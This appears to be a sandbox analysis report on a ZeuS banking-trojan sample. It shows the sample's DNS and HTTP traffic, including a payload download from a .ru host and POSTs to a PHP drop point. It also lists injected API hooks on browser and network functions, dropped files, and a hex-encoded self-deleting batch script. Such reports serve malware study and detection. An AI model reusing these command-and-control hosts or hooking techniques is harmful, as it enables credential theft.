Dec 1, 2011 15:18:17.929677010 CET 195.186.1.121 192.168.0.10 0x17ee No error (0) baygleefacfif.nightmail.ru 194.186.88.59 A (IP address) IN (0x0001)
Dec 1, 2011 15:18:47.639733076 CET 195.186.1.121 192.168.0.10 0x78d9 No error (0) www.google.com 74.125.39.99 A (IP address) IN (0x0001)
Dec 1, 2011 15:18:48.430505037 CET 195.186.1.121 192.168.0.10 0xa7b7 No error (0) sexsecret.com 184.168.213.44 A (IP address) IN (0x0001)
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 1, 2011 15:18:18.188780069 CET 1079 80 192.168.0.10 194.186.88.59 GET /profi.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: baygleefacfif.nightmail.ru
Cache-Control: no-cache
Dec 1, 2011 15:18:18.532304049 CET 80 1079 194.186.88.59 192.168.0.10 HTTP/1.1 200 OK
Server: nginx
Date: Thu, 01 Dec 2011 14:26:29 GMT
Content-Type: application/octet-stream
Content-Length: 105490
Last-Modified: Thu, 01 Dec 2011 13:07:45 GMT
Connection: close
Accept-Ranges: bytes
Dec 1, 2011 15:18:47.668677092 CET 1080 80 192.168.0.10 74.125.39.99 GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.google.com
Cache-Control: no-cache
Dec 1, 2011 15:18:47.939644098 CET 80 1080 74.125.39.99 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:26:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=89b343a8cb6b37c1:FF=0:TM=1322749619:LM=1322749619:S=7r6cvg9UyOg4A3o9; expires=Sat, 30-Nov-2013 14:26:59 GMT; path=/; domain=.google.com
Set-Cookie: NID=53=FJGoJsaEBLT8dWO9QrAgQMtQBsDEBiC1MtU37612_Owu2zDaTTh30f20TBvMoiAbnP4d8UQVApjsZqCWWBB0eKvmFpQUVBQ0SbjUvbm-xgQkPENTqBpI7pRHodbAdxki; expires=Fri, 01-Jun-2012 14:26:59 GMT; path=/; do
Dec 1, 2011 15:18:48.438009024 CET 1081 80 192.168.0.10 184.168.213.44 POST /store/includes/ext/red.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: sexsecret.com
Content-Length: 293
Connection: Keep-Alive
Cache-Control: no-cache
Dec 1, 2011 15:18:49.280440092 CET 80 1081 184.168.213.44 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:27:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Dec 1, 2011 15:18:49.514885902 CET 1081 80 192.168.0.10 184.168.213.44 POST /store/includes/ext/red.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: sexsecret.com
Content-Length: 206
Connection: Keep-Alive
Cache-Control: no-cache
Dec 1, 2011 15:18:50.054022074 CET 80 1081 184.168.213.44 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:27:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
GetFileAttributesExW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetUpdateRect INLINE wscntfy.exe, explorer.exe, ctfmon.exe
CallWindowProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
CallWindowProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
EndPaint INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetUpdateRgn INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetDCEx INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefWindowProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessageA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessageW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefDlgProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefDlgProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefWindowProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetClipboardData INLINE wscntfy.exe, explorer.exe, ctfmon.exe
OpenInputDesktop INLINE wscntfy.exe, explorer.exe, ctfmon.exe
PeekMessageA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
PeekMessageW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetWindowDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ReleaseDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SetCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefMDIChildProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefMDIChildProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefFrameProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefFrameProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassExW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
TranslateMessage INLINE wscntfy.exe, explorer.exe, ctfmon.exe
BeginPaint INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassExA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetCursorPos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessagePos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SwitchDesktop INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SetCursorPos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ReleaseCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ZwCreateThread INLINE wscntfy.exe, explorer.exe, ctfmon.exe
LdrLoadDll INLINE wscntfy.exe, explorer.exe, ctfmon.exe
NtCreateThread INLINE wscntfy.exe, explorer.exe, ctfmon.exe
closesocket INLINE explorer.exe
send INLINE explorer.exe
WSASend INLINE explorer.exe
PFXImportCertStore INLINE explorer.exe
InternetReadFile INLINE explorer.exe
HttpSendRequestA INLINE explorer.exe
HttpSendRequestW INLINE explorer.exe
InternetQueryDataAvailable INLINE explorer.exe
InternetReadFileExA INLINE explorer.exe
HttpSendRequestExA INLINE explorer.exe
HttpQueryInfoA INLINE explorer.exe
HttpSendRequestExW INLINE explorer.exe
InternetCloseHandle INLINE explorer.exe
+ Processes
+ Process: wscntfy.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x92
+ Process: wscntfy.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x26
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x86
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x16
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xA6
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x66
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x56
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x26
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x26
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x16
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x66
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xB6
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x46
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x36
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xE6
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x46
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x26
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x56
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x66
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xF6
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x86
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xB6
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x46
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x36
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x86
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x76
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x76
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x86
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x36
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x46
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x96
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x76
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xF6
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xC6
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x16
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x56
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x36
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x71
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x2B
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x8B
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x1B
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xAB
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x6B
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x5B
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x2B
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x2B
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x1B
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x6B
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xBB
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x4B
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x3B
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xEB
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x4B
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x2B
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x5B
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x6B
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xFB
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x8B
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xBB
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x4B
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x3B
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x8B
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x7B
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x7B
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x8B
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x3B
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x4B
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x9B
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x7B
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xFB
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xCB
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x1B
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x5B
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x3B
+ Process: explorer.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x97
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x76
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x76
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x76
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
closesocket INLINE 0xE9 0x98 0x83 0x38 0x8A 0xA4
send INLINE 0xE9 0x9B 0xBF 0xF7 0x7C 0xC4
WSASend INLINE 0xE9 0x90 0x0D 0xD6 0x60 0x04
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xE9 0x95 0x5F 0xF4 0x4E 0xE4
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xE9 0x92 0x2D 0xDD 0xDD 0xD6
HttpSendRequestA INLINE 0xE9 0x92 0x20 0x05 0x52 0x26
HttpSendRequestW INLINE 0xE9 0x99 0x97 0x74 0x45 0x56
InternetQueryDataAvailable INLINE 0xE9 0x97 0x7E 0xE8 0x83 0x36
InternetReadFileExA INLINE 0xE9 0x93 0x36 0x60 0x0F 0xF6
HttpSendRequestExA INLINE 0xE9 0x93 0x33 0x39 0x9B 0xB5
HttpQueryInfoA INLINE 0xE9 0x9A 0xA0 0x0B 0xBB 0xB6
HttpSendRequestExW INLINE 0xE9 0x93 0x3E 0xE9 0x9A 0xA5
InternetCloseHandle INLINE 0xE9 0x9A 0xAD 0xDB 0xB1 0x16
+ Process: ctfmon.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x26
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x86
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x16
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xA6
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x66
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x56
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x26
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x26
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x16
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x66
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xB6
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x46
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x36
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xE6
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x46
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x26
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x56
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x66
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xF6
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x86
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xB6
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x46
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x36
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x85
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x76
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x75
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x86
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x36
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x46
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x96
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x76
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xF6
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xC6
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x16
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x55
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x36
+ Process: ctfmon.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x92
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x71
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
Analysis File: ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe PID: 1960 Parent PID: 3152
+ Sections
+ General
Start time: 06:06:35
Start date: 01/12/2011
Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
Commandline: not known
Imagebase: 0x400000
File size: 171520 bytes
MD5 hash: FB65104CCD2CA664496234D3F2C2A371
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 4101EF
C:\Documents and Settings\Administrator\Application Data\887021879.log read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 3B182A
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 41AE9D
C:\Documents and Settings\Administrator\Application Data read attributes and synchronize and generic read synchronous io non alert and open for backup ident false success or wait 1 41B23D
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 41B132
C:\Documents and Settings\Administrator\Application Data\Foluv read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 C046EA
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log read attributes and synchronize and generic read and generic write none synchronous io non alert and non directory file success or wait 1 3B187E
C:\Documents and Settings\Administrator\Application Data\Foluv read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 410156
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 2 4101A7
C:\Documents and Settings\Administrator\Application Data\Qiokze read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 410156
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 4101A7
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 2 41AE2D
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log none 5 31 36 37 39 30 success or wait 1 3B18C1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe none 171520 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 41AE50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 206 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 1 41AE50
+ File read
File Path Offset Length Value Completion Count Source Address
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe none 171520 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2 41AEF0
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe BasicInformation 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 success or wait 2 4101EF
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei BasicInformation 00FF93D1CB24CC0100FF93D1CB24CC0100FF93D1CB24CC0100000000000000000000000000000000 success or wait 1 41B14C
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe query and write and read and execute and extend size image 5B860000 348160 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown BD0000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit BE0000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit BE0000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe query and read commit BE0000 172032 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image BE0000 172032 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit DB0000 1208320 own pid readonly success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit C20000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit C20000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
none query and write and read commit C20000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 3B05D3
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\shell32.dll read commit 930000 8462336 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 930000 1056768 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\comctl32.dll read commit 930000 618496 own pid readonly success or wait 1 3B05D3
\KnownDlls\WS2_32.dll write and read and execute unknown 930000 618496 own pid readonly object name not found 1 3B05D3
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 3B05D3
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 3B05D3
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 3B05D3
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 3B05D3
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 3B05D3
\KnownDlls\Normaliz.dll write and read and execute unknown 440000 36864 own pid read write conflicting addresses 1 3B05D3
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 3B05D3
